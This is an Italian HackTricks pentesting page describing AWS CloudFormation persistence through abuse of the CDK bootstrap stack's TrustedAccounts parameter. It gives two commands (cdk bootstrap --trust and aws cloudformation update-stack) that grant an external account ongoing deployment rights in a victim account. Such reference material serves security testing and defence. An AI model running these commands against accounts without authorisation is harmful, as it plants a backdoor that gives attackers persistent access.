hacktricks-cloud/src/pentesting-cloud/aws-security/aws-persistence/aws-cloudformation-persistence.md

AWS - Cloudformation Persistence

{{#include ../../../banners/hacktricks-training.md}}

CloudFormation

Per ulteriori informazioni, accedi a:

{{#ref}} ../aws-services/aws-cloudformation-and-codestar-enum.md {{#endref}}

CDK Bootstrap Stack

L'AWS CDK distribuisce uno stack CFN chiamato CDKToolkit. Questo stack supporta un parametro TrustedAccounts che consente a conti esterni di distribuire progetti CDK nell'account vittima. Un attaccante può abusare di questo per concedersi accesso indefinito all'account vittima, sia utilizzando l'AWS cli per ridistribuire lo stack con parametri, sia l'AWS CDK cli.

# CDK
cdk bootstrap --trust 1234567890

# AWS CLI
aws cloudformation update-stack --use-previous-template --parameters ParameterKey=TrustedAccounts,ParameterValue=1234567890

{{#include ../../../banners/hacktricks-training.md}}